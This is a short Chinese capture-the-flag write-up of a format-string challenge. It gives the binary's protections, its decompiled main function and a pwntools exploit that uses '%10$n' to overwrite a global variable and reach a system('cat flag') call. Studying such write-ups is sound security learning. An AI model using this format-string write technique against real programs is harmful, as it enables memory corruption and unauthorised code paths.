checksec:
Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000)
IDA:main 利用程序中的 printf(&s)修改pwnme的值为8即可获取到flag
int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; // [esp+22h] [ebp-7Ah] __int16 v6; // [esp+26h] [ebp-76h] char s; // [esp+28h] [ebp-74h] unsigned int v8; // [esp+8Ch] [ebp-10h] v8 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); buf = 0; v5 = 0; v6 = 0; memset(&s, 0, 0x64u); puts("please tell me your name:"); read(0, &buf, 0xAu); puts("leave your message please:"); fgets(&s, 100, stdin); printf("hello %s", &buf); puts("your message is:"); printf(&s); if ( pwnme == 8 ) { puts("you pwned me, here is your flag: "); system("cat flag"); } else { puts("Thank you!"); } return 0; }
exp:
from pwn import * io = remote('',) payload = p32(0x0804A068) + 'aaaa' + '%10$n' #804a068是pwnme的地址, io.sendlineafter('name:','aaa') io.sendlineafter('please:',payload) io.interactive()
注:
%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置